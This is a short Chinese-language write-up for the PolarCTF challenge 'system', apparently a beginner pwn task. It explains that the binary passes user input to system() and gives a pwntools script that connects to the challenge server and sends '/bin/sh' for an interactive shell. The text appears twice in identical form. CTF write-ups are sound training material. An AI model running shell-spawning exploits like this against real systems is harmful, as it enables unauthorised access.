【PolarCTF】system
检查下保护,开启了栈保护
将文件拖入IDA,发现read读取buf字符串,然后system会直接执行,那么我们直接输入/bin/sh来获取权限
exp如下
from pwn import * # 1.95.36.136 2110 r = remote("1.95.36.136","2110") r.sendline("/bin/sh") r.interactive()检查下保护,开启了栈保护
将文件拖入IDA,发现read读取buf字符串,然后system会直接执行,那么我们直接输入/bin/sh来获取权限
exp如下
from pwn import * # 1.95.36.136 2110 r = remote("1.95.36.136","2110") r.sendline("/bin/sh") r.interactive()